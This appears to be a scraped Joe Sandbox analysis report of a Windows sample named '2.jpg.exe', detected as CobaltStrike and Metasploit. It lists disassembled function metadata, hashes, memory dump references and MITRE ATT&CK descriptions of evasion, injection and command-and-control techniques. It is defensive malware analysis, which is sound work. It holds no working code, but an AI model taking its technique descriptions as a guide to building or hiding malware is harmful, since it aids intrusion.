Opcode Fuzzy Hash: 3efd203f101b790e6681c0b242396ab9e242ed13979c3716b155cedc8fe2e57a
Instruction Fuzzy Hash: 81E0D8324002047AEED136599C09EAF7B5CCF81971F104026FA2811144EE71554181FB

Uniqueness

Uniqueness Score: -1.00%

Function 067684E2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 067684EA
__snprintf.LIBCMT ref: 06768514

Strings

%s%s: %s, xrefs: 0676850B

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: __snprintf_memset
String ID: %s%s: %s
API String ID: 2657849664-533130479
Opcode ID: 2fcb33425075f17187558605441e28e1c9d54c7121142815122e266df7285339
Instruction ID: 4b1340640b397ed9e1215788fa328c74064f1363626660255e678e12b3b92dbf
Opcode Fuzzy Hash: 2fcb33425075f17187558605441e28e1c9d54c7121142815122e266df7285339
Instruction Fuzzy Hash: 63F085B2204244AFDB81EE50CC84E8B37B9AF8A700F044024BF406B150E636E911CB72

Uniqueness

Uniqueness Score: -1.00%

Function 067691B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 067691BE

Part of subcall function 067758CD: __FF_MSGBANNER.LIBCMT ref: 067758F0
Part of subcall function 067758CD: __NMSG_WRITE.LIBCMT ref: 067758F7
Part of subcall function 067758CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE), ref: 06775944

__snprintf.LIBCMT ref: 067691D2

Part of subcall function 067691F0: _malloc.LIBCMT ref: 067691FD
Part of subcall function 067691F0: __snprintf.LIBCMT ref: 0676920E
Part of subcall function 067691F0: FindFirstFileA.KERNEL32(00000000,0676466D,?,067692DF,0676466D,?,067645F1), ref: 0676921B
Part of subcall function 067691F0: _malloc.LIBCMT ref: 0676925A
Part of subcall function 067691F0: __snprintf.LIBCMT ref: 0676926F
Part of subcall function 067691F0: FindNextFileA.KERNEL32(000000FF,0676466D,?,?,?,?,?,?,?), ref: 0676929C
Part of subcall function 067691F0: FindClose.KERNEL32(000000FF,?,?,?,?,?,?,?), ref: 067692A9

Part of subcall function 067757F0: __lock.LIBCMT ref: 0677580E
Part of subcall function 067757F0: ___sbh_find_block.LIBCMT ref: 06775819
Part of subcall function 067757F0: ___sbh_free_block.LIBCMT ref: 06775828
Part of subcall function 067757F0: HeapFree.KERNEL32(00000000,00000000,067905E8,0000000C,0677A726,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C), ref: 06775858
Part of subcall function 067757F0: GetLastError.KERNEL32(?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE,00000000,00000000,?,0677A7E0,0000000D), ref: 06775869

Strings

%s\%s, xrefs: 067691CB

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Find__snprintf_malloc$FileHeap$AllocateCloseErrorFirstFreeLastNext___sbh_find_block___sbh_free_block__lock
String ID: %s\%s
API String ID: 1254174322-4073750446
Opcode ID: 92ed18a0824b421551f13b8dac53f0203af49de60ed50006035f0d661397fcfa
Instruction ID: b6405b12602da5cecf34244bb57e99b5f3feae42f1739fd94fa40f488f6fc2a3
Opcode Fuzzy Hash: 92ed18a0824b421551f13b8dac53f0203af49de60ed50006035f0d661397fcfa
Instruction Fuzzy Hash: F3E08C32441218779FC23F529C48DEF7E2DDF865A0B044025FF2822110EE368962A6B2

Uniqueness

Uniqueness Score: -1.00%

Function 06785E79 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

_RTC_Failure.LIBCMT ref: 06785E8C

Strings

abcdefghijklmnop, xrefs: 06785E86
abcdefghijklmnop, xrefs: 06785E85

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Failure
String ID: abcdefghijklmnop$abcdefghijklmnop
API String ID: 3995482717-935656707
Opcode ID: 4d1227ede6a145633f070787483e74cd4d58cfad1496ae03b9bb51402f780a7b
Instruction ID: 8f7b9258f48b9495f0b449265e4f4ab25c36400f254822d75008d319537c4bd5
Opcode Fuzzy Hash: 4d1227ede6a145633f070787483e74cd4d58cfad1496ae03b9bb51402f780a7b
Instruction Fuzzy Hash: EDD0C97B64D2083EF9A0B45A7D06FBB7B5CD7C1675E60416BFA0885080A9026D2591F9

Uniqueness

Uniqueness Score: -1.00%

Function 067685F5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 067685FD
__snprintf.LIBCMT ref: 06768622

Strings

%s%s, xrefs: 06768619

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: __snprintf_memset
String ID: %s%s
API String ID: 2657849664-3438391663
Opcode ID: dbb460522c5354b8fefa13b3145c29b87eaf103f86cf07849f21c3363697a198
Instruction ID: 57493ae516674958614a7398df387a42b30f1850310a57826c5a934f336cf09f
Opcode Fuzzy Hash: dbb460522c5354b8fefa13b3145c29b87eaf103f86cf07849f21c3363697a198
Instruction Fuzzy Hash: 8FE01272144344BFDBD1EF55CCC9E4B77BCAF89B04F004529BA5596011D636D914CB32

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 2.jpg.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: CobaltStrike

Threatname: Metasploit

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\Desktop\localfile_638491169974164363.txt

C:\Users\user\Desktop\localfile_638491175959284389.txt

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

Windows Analysis Report
2.jpg.exe

Function 06766C99 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123
COMMONLIBRARYCODE

Function 06767AF5 Relevance: 9.1, APIs: 6, Instructions: 113
networkCOMMONLIBRARYCODE

Function 0676C187 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44
encryptionCOMMONLIBRARYCODE

Function 05F300B5 Relevance: 4.7, APIs: 3, Instructions: 200
COMMON

Function 06762972 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 169
networkfileCOMMONLIBRARYCODE

Function 06766DF0 Relevance: 12.1, APIs: 8, Instructions: 124
COMMONLIBRARYCODE

Function 0676131C Relevance: 7.8, APIs: 5, Instructions: 280
COMMONLIBRARYCODE

Function 067692E4 Relevance: 7.6, APIs: 5, Instructions: 63
filememoryCOMMONLIBRARYCODE

Function 05F300CE Relevance: 6.1, APIs: 4, Instructions: 75
networkmemoryfileCOMMON

Function 06762BF0 Relevance: 4.6, APIs: 3, Instructions: 66
networkCOMMONLIBRARYCODE

Function 06766F4C Relevance: 4.5, APIs: 3, Instructions: 35
COMMONLIBRARYCODE

Function 008F2D34 Relevance: 3.6, APIs: 2, Instructions: 610
memorythreadCOMMON

Function 05F3016B Relevance: 3.1, APIs: 2, Instructions: 106
memoryfilenetworkCOMMON

Function 05F30229 Relevance: 3.1, APIs: 2, Instructions: 80
memoryfilenetworkCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre